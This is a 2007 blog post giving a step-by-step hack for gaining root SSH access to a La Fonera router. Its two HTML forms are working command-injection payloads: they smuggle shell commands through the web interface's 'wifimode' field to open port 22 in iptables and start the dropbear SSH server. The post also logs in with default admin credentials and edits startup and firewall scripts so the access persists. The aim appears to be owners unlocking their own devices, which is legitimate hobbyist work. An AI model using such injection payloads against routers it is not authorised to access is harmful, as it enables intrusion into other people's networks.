Mittwoch, 7. März 2007

Hacking the La Fonera - PART II

Inspired by Michaels and Stefans Hack the FON-Community found the following way to inject inject Shell code into the system without using FONs Website.

NOTE:
The method presented here WORKS! (at least with the present firmware 7.0 r4)

How to hack the fonera?

To open SSH access and to prevent FON from executing code on your LA Fonera do the following: Safe the following code as "step1.html" on your harddisk:

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data">
<input name="wifimode" value="/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}" />
</form>
</body>
</html>

And now safe this code as "step2.html" on your harddisk:

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data">
<input name="wifimode" value="/etc/init.d/dropbear" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}" />
</form>
</body>
</html>

Now power on the "La Fonera" (there is no need to connect the fonera-box to the internet). Wait until you can see the WLAN-AP "MyPlace" and connect to it (use the serial number as WPA-key).

After successful connection open the html-pages "step1.html" and "step2.html" in your browser to see thefollowing:

Now click the SUBMIT-Button on the first webpage, authenticate with username "admin" and password "admin" (fonera-defaults!) and wait until the browser is ready (you will see some wired code and html - just ignore)

After this swith to the second webpage (page 02) and click on this SUBMIT-button.


Now you are ready to connect your LA FONERA via ssh. Connect with Putty (download here) via SSH (SSH 1) to IP 192.168.10.1 (La Fonera Router) and login with username "root" and password "admin" (default).

After that, do the following to permanently enable shell access:
# mv /etc/init.d/dropbear /etc/init.d/S50dropbear
# vi /etc/firewall.user

[PRESS i]

PRESS "i" to edit the firewall settings by uncommenting the two lines at the SSH section, so it will look like this

Now safe your work by pressing "ESC" and typing ":wq" (write and quit) and pressing ENTER. Now you can reboot or type these:

# /etc/init.d/S50dropbear
# /etc/firewall.user

Last but not least you should prevent FON from executing code on your box
by doing the following within the script /bin/thinclient:

vi /bin/thinclient
If you want to prevent La Fonera from executing that received code, you might want to change the final lines (at the end of the script "/bin/thinclient" to the following:

Now you have full access to your box... :-)